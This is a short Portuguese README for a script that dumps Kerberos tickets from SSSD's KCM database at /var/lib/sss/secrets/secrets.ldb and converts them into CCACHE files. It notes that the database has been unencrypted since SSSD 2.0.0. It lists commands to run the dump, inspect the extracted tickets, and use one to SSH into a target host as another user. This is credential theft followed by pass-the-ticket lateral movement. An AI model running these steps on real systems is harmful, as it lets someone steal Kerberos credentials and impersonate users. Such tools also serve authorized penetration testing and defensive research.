
Extrair tickets Kerberos do banco de dados KCM do SSSD
Script rápido para fazer o dump do banco de dados KCM usado pelo SSSD e recuperar tickets Kerberos no formato CCACHE.
Inicialmente baseado em SSSDKCMExtractor e KCMTicketFormatter.
Desde a versão 2.0.0 (2018-08-13), o armazenamento de back-end do responder KCM do SSSD não criptografa mais o conteúdo do banco de dados. No entanto, ele ainda depende de um banco de dados LDB (por sua vez baseado em TDB), o que o torna facilmente pesquisável usando consultas semelhantes a LDAP.
O SSSD usa um formato de armazenamento personalizado para tickets Kerberos, que podem ser convertidos em arquivos CCACHE padrão usando este script.
$ apt install python3-construct python3-ldb
$ python3 kcmdump.py /var/lib/sss/secrets/secrets.ldb
$ ls -lh
-rw-r--r--. 1 root root 1.3K Jan 1 00:00 user_0.ccache
-rw-r--r--. 1 root root 1.8K Jan 1 00:00 kcmdump.py
$ KRB5CCNAME=user_0.ccache klist
$ KRB5CCNAME=user_0.ccache ssh [email protected]@target.corp.local